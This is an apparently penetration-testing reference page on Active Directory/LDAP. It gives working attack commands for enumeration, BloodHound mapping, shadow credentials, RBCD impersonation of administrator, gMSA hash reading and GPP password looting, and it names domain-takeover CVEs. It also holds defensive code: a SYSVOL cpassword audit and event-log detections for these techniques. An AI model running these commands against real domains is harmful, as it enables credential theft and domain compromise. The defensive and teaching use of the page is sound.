Category: Directory / AD. Ports: 88/tcp, 389/tcp, 636/tcp, 3268/tcp

Active Directory / LDAP

aka LDAP, AD, Domain Controller

The Windows directory exposed over LDAP (389/636) and the GC (3268). Map it with BloodHound, then abuse ACLs, Kerberos roasting, and delegation to walk to Domain Admin.

Ports

Port   Proto   Notes
88     tcp     Kerberos (DC indicator)
389    tcp     LDAP
636    tcp     LDAPS
3268   tcp     Global Catalog

Fingerprint

  • 88 + 389 + 445 open together means a Domain Controller
  • LDAP/SMB leak the domain name and naming context

Key files

Path                                 Holds                                                              Sensitive
NTDS.dit                             the AD database, all domain hashes (DCSync / volume shadow copy)   yes
user description / info attributes   admins sometimes store passwords here                              yes
SYSVOL scripts and GPP               logon scripts and cpassword secrets                                yes

Known CVEs

CVE                       Impact
CVE-2020-1472             Zerologon, instant DC compromise
CVE-2021-42278 / 42287    noPac, privilege escalation to DA
CVE-2022-26923            Certifried, machine account to DA via ADCS

Exploitation primitives

  • BloodHound (bloodhound-python / SharpHound) to map attack paths and ACLs
  • Kerberoast SPN accounts and AS-REP roast accounts without preauth, then crack offline
  • ACL abuse: GenericAll / GenericWrite / WriteDACL, shadow credentials (msDS-KeyCredentialLink), RBCD
  • DCSync with replication rights; check ms-DS-MachineAccountQuota for computer-account creation

Overview

A Domain Controller advertises itself with Kerberos (88), LDAP (389) and SMB (445) together. With any domain credential, collect the graph and let BloodHound show you the shortest path to Domain Admin.

Enumeration

Enumerate users over LDAP:

nxc ldap <TARGET> -u user -p pass --users

LDAP search for accounts:

ldapsearch -x -H ldap://<TARGET> -D 'DOM\user' -w pass -b 'DC=dom,DC=local' '(samaccountname=*)'

Collect the BloodHound graph:

bloodhound-python -u user -p pass -d dom.local -ns <TARGET> -c All

Common moves

  • Roast: GetUserSPNs.py (kerberoast), GetNPUsers.py (AS-REP).
  • Abuse the edge BloodHound flags (GenericAll, WriteDACL, etc.).
  • Check info/description attributes for stashed passwords.

Shadow credentials

Add a key to the target’s msDS-KeyCredentialLink, then authenticate with PKINIT to recover its NT hash:

certipy shadow auto -u user@dom.local -p pass -account 'victim$' -dc-ip <TARGET>

Resource-Based Constrained Delegation (RBCD)

With write over a computer object, set yourself as allowed-to-delegate, then impersonate:

rbcd.py -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write -dc-ip <TARGET> dom.local/user:pass
getST.py -spn cifs/target.dom.local -impersonate administrator dom.local/'EVILPC$':pass

Read a gMSA password

Members of the gMSA’s PrincipalsAllowedToRetrieve can pull its NT hash:

nxc ldap <TARGET> -u user -p pass --gmsa

Loot SYSVOL (GPP cpassword)

nxc smb <TARGET> -u user -p pass -M gpp_password
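The defender's counterpart to the module above is an audit of SYSVOL for preference files that still carry a cpassword attribute. The script below is an added example for this page, not code from the page or from nxc; the Groups.xml it parses is constructed and the cpassword value in it is a placeholder, not a real encrypted blob.

```python
"""Audit Group Policy Preferences XML under SYSVOL for leftover cpassword
attributes. Added example; the sample XML is constructed."""
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# Constructed Groups.xml: one stale cpassword entry, one clean entry.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_backup"
        changed="2024-01-15 10:00:00" uid="{11111111-1111-1111-1111-111111111111}">
    <Properties action="U" userName="svc_backup" description="backup service"
                cpassword="PLACEHOLDER_CPASSWORD_VALUE==" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="helpdesk"
        changed="2024-02-01 09:30:00" uid="{22222222-2222-2222-2222-222222222222}">
    <Properties action="U" userName="helpdesk" description="no stored secret"/>
  </User>
</Groups>
"""

# Attributes that name the account on the GPP element types which can carry cpassword
# (local users, scheduled tasks, services, drive maps).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "name")


def find_cpasswords(xml_text: str, source: str = "<memory>") -> List[Dict[str, str]]:
    """Return one finding per element that still has a cpassword attribute.

    Only the presence and length of the value are reported; the value itself
    is never echoed, because the file is the artefact to clean up.
    """
    findings: List[Dict[str, str]] = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if cpw is None:
            continue
        account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
        findings.append({
            "source": source,
            "element": elem.tag,
            "account": account,
            "cpassword_len": str(len(cpw)),
        })
    return findings


def scan_sysvol(sysvol_root: str) -> List[Dict[str, str]]:
    """Walk a SYSVOL copy or mount and collect findings from every *.xml.

    Malformed or unreadable files are skipped rather than aborting the audit.
    """
    results: List[Dict[str, str]] = []
    for path in Path(sysvol_root).rglob("*.xml"):
        try:
            results.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
        except (ET.ParseError, OSError):
            continue
    return results


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, source="Groups.xml"):
        print(f"{f['source']}: <{f['element']}> account={f['account']} "
              f"cpassword present ({f['cpassword_len']} chars)")
```

Run `scan_sysvol(r"\\dc\SYSVOL\dom.local\Policies")` (path is an assumption) from a domain-joined host. Every hit is a preference item to delete and an account whose password to rotate: MS14-025 stopped the GP editor from writing new cpassword values but left existing ones in place.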

Hardening

Tier admin accounts, enforce strong service-account passwords, monitor ACL changes, and patch the DC takeover CVEs.
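"Monitor ACL changes" and the roasting and delegation primitives listed earlier translate into a handful of Security-log detections. The block below is an added example for this page, not code from the page or from any tool it names: the event IDs and field names are the standard Windows Security ones, the event records are constructed, and the `svc_join` provisioning account is an assumption.

```python
"""Detections for the roasting, ACL-abuse, delegation and machine-account
primitives above, run over constructed Windows Security event records.
Added example; records are made up. Events and fields used:
  4769 service ticket requested  TargetUserName, ServiceName, TicketEncryptionType
  4768 TGT requested             TargetUserName, PreAuthType
  5136 directory object modified SubjectUserName, ObjectDN, AttributeLDAPDisplayName
  4741 computer account created  SubjectUserName (creator), TargetUserName (new account)
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

RC4_HMAC = "0x17"  # AES tickets are 0x11 / 0x12; RC4 is the crackable type roasting asks for

# Attribute writes that correspond to the ACL / delegation primitives on this page.
SENSITIVE_ATTRS = {
    "nTSecurityDescriptor": "ACL change (WriteDACL / GenericAll)",
    "msDS-KeyCredentialLink": "shadow credentials",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD",
    "servicePrincipalName": "SPN set (targeted Kerberoast)",
    "userAccountControl": "UAC change (e.g. preauth disabled)",
}
PROVISIONING_ACCOUNTS = {"svc_join"}  # assumed: accounts allowed to join machines

Event = Dict[str, object]
EVENTS: List[Event] = [  # constructed sample records
    {"EventID": 4769, "TargetUserName": "jdoe@DOM.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOM.LOCAL", "ServiceName": "svc_http", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "jdoe@DOM.LOCAL", "ServiceName": "WS01$", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "TargetUserName": "alice@DOM.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": "0"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectDN": "CN=TARGET,CN=Computers,DC=dom,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"EventID": 5136, "SubjectUserName": "jdoe", "ObjectDN": "CN=victim,CN=Computers,DC=dom,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"EventID": 5136, "SubjectUserName": "hr_admin", "ObjectDN": "CN=bob,CN=Users,DC=dom,DC=local",
     "AttributeLDAPDisplayName": "telephoneNumber"},
    {"EventID": 4741, "SubjectUserName": "jdoe", "TargetUserName": "EVILPC$"},
    {"EventID": 4741, "SubjectUserName": "svc_join", "TargetUserName": "WS02$"},
]


def detect_kerberoast(events: Iterable[Event], min_spns: int = 2) -> Dict[str, List[str]]:
    """Requesters pulling RC4 service tickets for several user SPNs.

    Machine accounts (name$) and krbtgt are normal TGS traffic and are skipped;
    one user collecting RC4 tickets for many service accounts is the GetUserSPNs.py pattern.
    """
    per_user: Dict[str, set] = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769:
            continue
        svc = str(e.get("ServiceName", ""))
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if e.get("TicketEncryptionType") == RC4_HMAC:
            per_user[str(e["TargetUserName"])].add(svc)
    return {u: sorted(s) for u, s in per_user.items() if len(s) >= min_spns}


def detect_asrep_roast(events: Iterable[Event]) -> List[str]:
    """Accounts issued a TGT without pre-authentication (PreAuthType 0)."""
    return sorted({str(e["TargetUserName"]) for e in events
                   if e["EventID"] == 4768 and e.get("PreAuthType") == "0"})


def detect_sensitive_writes(events: Iterable[Event]) -> List[Dict[str, str]]:
    """5136 modifications of attributes that hand out control or delegation."""
    hits = []
    for e in events:
        attr = str(e.get("AttributeLDAPDisplayName", ""))
        if e["EventID"] == 5136 and attr in SENSITIVE_ATTRS:
            hits.append({"who": str(e["SubjectUserName"]), "object": str(e["ObjectDN"]),
                         "attr": attr, "why": SENSITIVE_ATTRS[attr]})
    return hits


def detect_machine_account_creation(events: Iterable[Event]) -> List[Tuple[str, str]]:
    """4741 computer accounts created by anyone outside the provisioning set
    (the ms-DS-MachineAccountQuota default of 10 lets any domain user do this)."""
    return [(str(e["SubjectUserName"]), str(e["TargetUserName"])) for e in events
            if e["EventID"] == 4741 and e["SubjectUserName"] not in PROVISIONING_ACCOUNTS]


def run_all(events: List[Event]) -> Dict[str, object]:
    return {
        "kerberoast": detect_kerberoast(events),
        "asrep_roast": detect_asrep_roast(events),
        "sensitive_writes": detect_sensitive_writes(events),
        "machine_account_creation": detect_machine_account_creation(events),
    }


if __name__ == "__main__":
    for name, hits in run_all(EVENTS).items():
        print(f"{name}: {hits}")
```

The 5136 rule only fires if object auditing (SACL) is enabled on the computer and user containers; the 4769 rule drops to noise once service accounts are AES-only, which is itself the fix for Kerberoasting. Thresholds are deliberately low for the sample; tune `min_spns` against real TGS volume.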

